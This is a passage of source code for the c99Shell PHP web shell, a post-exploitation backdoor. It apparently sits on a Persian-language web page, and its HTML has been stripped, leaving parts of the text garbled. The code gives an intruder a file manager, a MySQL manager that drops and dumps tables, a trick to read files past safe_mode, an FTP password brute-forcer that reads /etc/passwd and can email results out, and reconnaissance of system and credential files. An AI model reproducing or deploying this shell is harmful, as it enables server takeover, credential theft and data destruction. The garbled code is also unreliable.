تماس با ما پی دی اف پرینت ایمیل

!c99Shell v. !

Software:  

uname -a:  ",1); ?> 

",1);} else {echo get_current_user();} ?> 

Safe-mode: 

$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
 $t = "";
 $j = 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "".htmlspecialchars($b).DIRECTORY_SEPARATOR."";
 $i++;
}
echo "   ";
if (is_writable($d))
{
 $wd = TRUE;
 $wdt = "[ ok ]";
 echo "".view_perms(fileperms($d))."";
}
else
{
 $wd = FALSE;
 $wdt = "[ Read-Only ]";
 echo "".view_perms_color($d)."";
}
if (is_callable("disk_free_space"))
{
 $free = disk_free_space($d);
 $total = disk_total_space($d);
 if ($free === FALSE) {$free = 0;}
 if ($total === FALSE) {$total = 0;}
 if ($free < 0) {$free = 0;}
 if ($total < 0) {$total = 0;}
 $used = $total-$free;
 $free_percent = round(100/($total/$free),2);
 echo "
Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)";
}
echo "
";
$letters = "";
if ($win)
{
 $v = explode("\\",$d);
 $v = $v[0];
 foreach (range("a","z") as $letter)
 {
  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  if (!$bool) {$bool = is_dir($letter.":\\");}
  if ($bool)
  {
   $letters .= "[ ";
   if ($letter.":" != $v) {$letters .= $letter;}
   else {$letters .= "".$letter."";}
   $letters .= " ]
";
  }
 }
 if (!empty($letters)) {echo "Detected drives: ".$letters."
";}
}
if (count($quicklaunch) > 0)
{
 foreach($quicklaunch as $item)
 {
  $item[1] = str_replace("%d",urlencode($d),$item[1]);
  $item[1] = str_replace("%sort",$sort,$item[1]);
  $v = realpath($d."..");
  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  echo "".$item[0]."    ";
 }
}
echo "


";
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
".$donated_html."

";}
echo "";
     $line = explode(" ",$line);
     $line[10] = join(" ",array_slice($line,10));
     $line = array_slice($line,0,11);
     if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";}
     $line[] = "KILL";
     $prcs[] = $line;
     echo "";
    }
   }
  }
  else
  {
   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
   $ret = convert_cyr_string($ret,"d","w");
   $stack = explode("\n",$ret);
   unset($stack[0],$stack[2]);
   $stack = array_values($stack);
   $head = explode("",$stack[0]);
   $head[1] = explode(" ",$head[1]);
   $head[1] = $head[1][0];
   $stack = array_slice($stack,1);
   unset($head[2]);
   $head = array_values($head);
   if ($parsesort[1] != "a") {$y = "";}
   else {$y = "";}
   if ($k > count($head)) {$k = count($head)-1;}
   for($i=0;$i";
     $line = explode("",$line);
     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
     $line[2] = intval(str_replace(" ","",$line[2]))*1024;
     $prcs[] = $line;
     echo "";
    }
   }
  }
  $head[$k] = "".$head[$k]."".$y;
  $v = $processes_sort[0];
  usort($prcs,"tabsort");
  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  $tab = array();
  $tab[] = $head;
  $tab = array_merge($tab,$prcs);
  echo "
";
if ($act == "") {$act = $dspact = "ls";}
if ($act == "sql")
{
 $sql_surl = $surl."act=sql";
 if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
 if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
 if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
 $sql_surl .= "&";
 ?>

Attention! SQL-Manager is NOT ready module! Don't reports bugs.

";
 if (!$sql_sock) {?>";
 }
 echo "
 if ($sql_server)
 {
  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  $err = mysql_smarterror();
  @mysql_select_db($sql_db,$sql_sock);
  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
 }
 else {$sql_sock = FALSE;}
 echo "SQL Manager:
";
 if (!$sql_sock)
 {
  if (!$sql_server) {echo "NO CONNECTION";}
  else {echo "
Can't connect
"; echo "".$err."";}
 }
 else
 {
  $sqlquicklaunch = array();
  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
";
  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
  echo "
";
 }
 echo "
i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
 else
 {
  //Start left panel
  if (!empty($sql_db))
  {
   ?>
 Please, fill the form:  
Username Password  Database 
Host PORT
 
">Home
   $result = mysql_list_tables($sql_db);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    echo "---[ ".htmlspecialchars($sql_db)." ]---
";
    $c = 0;
    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
"; mysql_free_result($count); $c++;}
    if (!$c) {echo "No tables found in database.";}
   }
  }
  else
  {
   ?>
Home
   $result = mysql_list_dbs($sql_sock);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    ?>

Please, select database
  }
  //End left panel
  echo "
";
  //Start center panel
  $diplay = TRUE;
  if ($sql_db)
  {
   if (!is_numeric($c)) {$c = 0;}
   if ($c == 0) {$c = "no";}
   echo "
There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
";
   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
   echo "
";
   $acts = array("","dump");
   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
   elseif ($sql_tbl_act == "insert")
   {
    if ($sql_tbl_insert_radio == 1)
    {
     $keys = "";
     $akeys = array_keys($sql_tbl_insert);
     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
     $values = "";
     $i = 0;
     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
    elseif ($sql_tbl_insert_radio == 2)
    {
     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
     $result = mysql_query($sql_query) or print(mysql_smarterror());
     $result = mysql_fetch_array($result, MYSQL_ASSOC);
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
   }
   if ($sql_act == "query")
   {
    echo "
";
    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
".$sql_query_error."
";}
    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
    if ((!$submit) or ($sql_act)) {echo "
"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo " 
";}
   }
   if (in_array($sql_act,$acts))
   {
    ?>
Create new table:
 
Dump DB:
"> 
 
     
    if (!empty($sql_act)) {echo "
";}
    if ($sql_act == "newtbl")
    {
     echo "";
     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!

";
    }
    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason: ".mysql_smarterror();}
   }
   elseif ($sql_act == "dump")
   {
    if (empty($submit))
    {
     $diplay = FALSE;
     echo "
SQL-Dump:

";
     echo "DB: 

";
     $v = join (";",$dmptbls);
     echo "Only tables (explode \";\") 1: 

";
     if ($dump_file) {$tmp = $dump_file;}
     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
     echo "File: 

";
     echo "Download:  

";
     echo "Save to file:  ";
     echo "1 - all, if empty";
     echo "
";
    }
    else
    {
     $diplay = TRUE;
     $set = array();
     $set["sock"] = $sql_sock;
     $set["db"] = $sql_db;
     $dump_out = "download";
     $set["print"] = 0;
     $set["nl2br"] = 0;
     $set[""] = 0;
     $set["file"] = $dump_file;
     $set["add_drop"] = TRUE;
     $set["onlytabs"] = array();
     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
     $ret = mysql_dump($set);
     if ($sql_dump_download)
     {
      @ob_clean();
      header("Content-type: application/octet-stream");
      header("Content-length: ".strlen($ret));
      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
      echo $ret;
      exit;
     }
     elseif ($sql_dump_savetofile)
     {
      $fp = fopen($sql_dump_file,"w");
      if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
      else
      {
       fwrite($fp,$ret);
       fclose($fp);
       echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).").";
      }
     }
     else {echo "Dump: nothing to do!";}
    }
   }
   if ($diplay)
   {
    if (!empty($sql_tbl))
    {
     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
     $count_row = mysql_fetch_array($count);
     mysql_free_result($count);
     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
     $tbl_struct_fields = array();
     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
     $perpage = $sql_tbl_le - $sql_tbl_ls;
     if (!is_numeric($perpage)) {$perpage = 10;}
     $numpages = $count_row[0]/$perpage;
     $e = explode(" ",$sql_order);
     if (count($e) == 2)
     {
      if ($e[0] == "d") {$asc_desc = "DESC";}
      else {$asc_desc = "ASC";}
      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
     }
     else {$v = "";}
     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
     $result = mysql_query($query) or print(mysql_smarterror());
     echo "
Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
";
     echo "Structure ]   ";
     echo "Browse ]   ";
     echo "Dump ]   ";
     echo "Insert ]   ";
     if ($sql_tbl_act == "structure") {echo "

Coming sooon!";}
     if ($sql_tbl_act == "insert")
     {
      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
      if (!empty($sql_tbl_insert_radio))
      {

      }
      else
      {
       echo "

Inserting row into table:
";
       if (!empty($sql_tbl_insert_q))
       {
        $sql_query = "SELECT * FROM `".$sql_tbl."`";
        $sql_query .= " WHERE".$sql_tbl_insert_q;
        $sql_query .= " LIMIT 1;";
        $result = mysql_query($sql_query,$sql_sock) or print("

".mysql_smarterror());
        $values = mysql_fetch_assoc($result);
        mysql_free_result($result);
       }
       else {$values = array();}
       echo "
";
       foreach ($tbl_struct_fields as $field)
       {
        $name = $field["Field"];
        if (empty($sql_tbl_insert_q)) {$v = "";}
        echo "";
        $i++;
       }
       echo "
Field Type Function Value
".htmlspecialchars($name)." ".$field["Type"]."

";
       echo "Insert as new row";
       if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";}
       echo "

";
      }
     }
     if ($sql_tbl_act == "browse")
     {
      $sql_tbl_ls = abs($sql_tbl_ls);
      $sql_tbl_le = abs($sql_tbl_le);
      echo "
";
      echo "\"Pages\" ";
      $b = 0;
      for($i=0;$i<$numpages;$i++)
      {
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";}
       echo $i;
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "
";}
       if (($i/30 == round($i/30)) and ($i > 0)) {echo "
";}
       else {echo " ";}
      }
      if ($i == 0) {echo "empty";}
      echo "
From:  To:  
";
      echo "
";
      echo "";
      echo "";
      for ($i=0;$i";
      }
      echo "";
      echo "";
      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
      {
       echo "";
       $w = "";
       $i = 0;
       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
       echo "";
       $i = 0;
       foreach ($row as $k=>$v)
       {
        $v = htmlspecialchars($v);
        if ($v == "") {$v = "NULL";}
        echo "";
        $i++;
       }
       echo "";
       echo "";
      }
      mysql_free_result($result);
      echo "
";
       if (empty($e[0])) {$e[0] = "a";}
       if ($e[1] != $v) {echo "".$v."";}
       else {echo "".$v."\"".$m."\"";}
       echo "
Action
".$v." ";
       echo "\"Delete\" ";
       echo "\"Edit\" ";
       echo "

 

 

";
     }
    }
    else
    {
     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
     if (!$result) {echo mysql_smarterror();}
     else
     {
      echo "
";
      $i = 0;
      $tsize = $trows = 0;
      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
      {
       $tsize += $row["Data_length"];
       $trows += $row["Rows"];
       $size = view_size($row["Data_length"]);
       echo "";
       echo "";
       echo "";
       echo "";
       echo "";
       echo "";
       echo "";
       echo "";
       echo "";
       echo "";
       $i++;
      }
      echo "";
      echo "";
      echo "";
      echo "";
      echo "";
      echo "";
      echo "";
      echo "";
      echo "";
      echo "";
      echo "
Table
Rows Type Created Modified Size Action
 ".$row["Name"]."  ".$row["Rows"]." ".$row["Type"]." ".$row["Create_time"]." ".$row["Update_time"]." ".$size."  \"Empty\"  \"Drop\" \"Insert\" 
»
".$i." table(s)
".$trows." ".$row[1]." ".$row[10]." ".$row[11]." ".view_size($tsize)."  

 

 

";
      mysql_free_result($result);
     }
    }
   }
   }
  }
  else
  {
   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
   if (in_array($sql_act,$acts)) {?>
Create new DB:
 
View File:
 
 
     
   if (!empty($sql_act))
   {
    echo "
";
    if ($sql_act == "newdb")
    {
     echo "";
     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!

";}
     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason:
".mysql_smarterror();}
    }
    if ($sql_act == "serverstatus")
    {
     $result = mysql_query("SHOW STATUS", $sql_sock);
     echo "
Server-status variables:

";
     echo "";
     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";}
     echo "
Name Value
".$row[0]." ".$row[1]."
";
     mysql_free_result($result);
    }
    if ($sql_act == "servervars")
    {
     $result = mysql_query("SHOW VARIABLES", $sql_sock);
     echo "
Server variables:

";
     echo "";
     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";}
     echo "
Name Value
".$row[0]." ".$row[1]."
";
     mysql_free_result($result);
    }
    if ($sql_act == "processes")
    {
     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";}
     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
     echo "
Processes:

";
     echo "";
     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";}
     echo "
ID USER HOST DB COMMAND TIME STATE INFO Action
".$row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." Kill
";
     mysql_free_result($result);
    }
    if ($sql_act == "getfile")
    {
     $tmpdb = $sql_login."_tmpdb";
     $select = mysql_select_db($tmpdb);
     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
     if ($select)
     {
      $created = FALSE;
      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
      $result = mysql_query("SELECT * FROM tmp_file;");
      if (!$result) {echo "Error in reading file (permision denied)!";}
      else
      {
       for ($i=0;$i
";
 if ($sql_sock)
 {
  $affected = @mysql_affected_rows($sql_sock);
  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  echo "
Affected rows: ".$affected."
";
}
if ($act == "mkdir")
{
 if ($mkdir != $d)
 {
  if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";}
  elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}
  echo "

";
 }
 $act = $dspact = "ls";
}
if ($act == "ftpquickbrute")
{
 echo "Ftp Quick brute:
";
 if (!win) {echo "This functions not work in Windows!

";}
 else
 {
  function c999ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  {
   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
   else {$TRUE = TRUE;}
   if ($TRUE)
   {
    $sock = @ftp_connect($host,$port,$timeout);
    if (@ftp_login($sock,$login,$pass))
    {
     echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
";
     ob_flush();
     return TRUE;
    }
   }
  }
  if (!empty($submit))
  {
   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
   $fp = fopen("/etc/passwd","r");
   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
   else
   {
    if ($fqb_logging)
    {
     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
     else {$fqb_logfp = FALSE;}
     $fqb_log = "FTP Quick Brute (called c999shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    }
    ob_flush();
    $i = $success = 0;
    $ftpquick_st = getmicrotime();
    while(!feof($fp))
    {
     $str = explode(":",fgets($fp,2048));
     if (c999ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
     {
      echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
";
      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
      $success++;
      ob_flush();
     }
     if ($i > $fqb_lenght) {break;}
     $i++;
    }
    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
    echo "
Done!
Total time (secs.): ".$ftpquick_t."
Total connections: ".$i."
Success.: ".$success."
Unsuccess.:".($i-$success)."
Connects per second: ".round($i/$ftpquick_t,2)."
";
    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    if ($fqb_logemail) {@mail($fqb_logemail,"c999shell v. ".$shver." report",$fqb_log);}
    fclose($fqb_logfp);
   }
  }
  else
  {
   $logfile = $tmpdir_logs."c999sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
   echo "

Read first:

Users only with shell? 

Logging? 
Logging to file? 
Logging to e-mail? 

";
  }
 }
}
if ($act == "d")
{
 if (!is_dir($d)) {echo "
Permision denied!
";}
 else
 {
  echo "Directory information:";
  if (!$win)
  {
   echo "
Owner/Group ";
   $ow = posix_getpwuid(fileowner($d));
   $gr = posix_getgrgid(filegroup($d));
   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  }
  echo "
Perms ".view_perms_color($d)."
Create time ".date("d/m/Y H:i:s",filectime($d))."
Access time ".date("d/m/Y H:i:s",fileatime($d))."
MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

";
 }
}
if ($act == "phpinfo") {@ob_clean(); phpinfo(); c999shexit();}
if ($act == "security")
{
 echo "
Server security information:
Open base dir: ".$hopenbasedir."
";
 if (!$win)
 {
  if ($nixpasswd)
  {
   if ($nixpasswd == 1) {$nixpasswd = 0;}
   echo "*nix /etc/passwd:
";
   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
   echo "
From:  To:  

";
   $i = $nixpwd_s;
   while ($i < $nixpwd_e)
   {
    $uid = posix_getpwuid($i);
    if ($uid)
    {
     $uid["dir"] = "".$uid["dir"]."";
     echo join(":",$uid)."
";
    }
    $i++;
   }
  }
  else {echo "
Get /etc/passwd
";}
 }
 else
 {
  $v = $_SERVER["WINDIR"]."\repair\sam";
  if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
";}
  else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
";}
 }
 if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
";}
 if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
";}
 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
";}
 if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
";}
 if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
";}
 if (file_get_contents("/etc/motd")) {echo "Message Of The Day
";}
 if (file_get_contents("/etc/hosts")) {echo "Hosts
";}
 function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
";}}
 displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
 displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
 displaysecinfo("RAM",myshellexec("free -m"));
 displaysecinfo("HDD space",myshellexec("df -h"));
 displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
 displaysecinfo("Is cURL installed?",myshellexec("which curl"));
 displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
 displaysecinfo("Is links installed?",myshellexec("which links"));
 displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
 displaysecinfo("Is GET installed?",myshellexec("which GET"));
 displaysecinfo("Is perl installed?",myshellexec("which perl"));
 displaysecinfo("Where is apache",myshellexec("whereis apache"));
 displaysecinfo("Where is perl?",myshellexec("whereis perl"));
 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
}
if ($act == "mkfile")
{
 if ($mkfile != $d)
 {
  if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";}
  elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";}
  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
 }
 else {$act = $dspact = "ls";}
}
if ($act == "encoder")
{
 echo "
Encoder:
Input:
Hashes:
";
 foreach(array("md5","crypt","sha1(((9"crc32") as $v)
 {
  echo $v." -
";
 }
 echo "
Url:

urlencode -
 
urldecode -
 
Base64:
base64_encode -
";
 echo "
base64_decode - ";
 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";}
 else
 {
  $debase64 = base64_decode($encoder_input);
  $debase64 = str_replace("\0","[0]",$debase64);
  $a = explode("\r\n",$debase64);
  $rows = count($a);
  $debase64 = htmlspecialchars($debase64);
  if ($rows == 1) {echo "";}
  else {$rows++; echo "";}
  echo " ^";
 }
 echo "

Base convertations:
dec2hex -  $c = strlen($encoder_input);
 for($i=0;$i<$c;$i++)
 {
  $hex = dechex(ord($encoder_input[$i]));
  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
 }
 echo "\" readonly>
";
}
if ($act == "fsbuff")
{
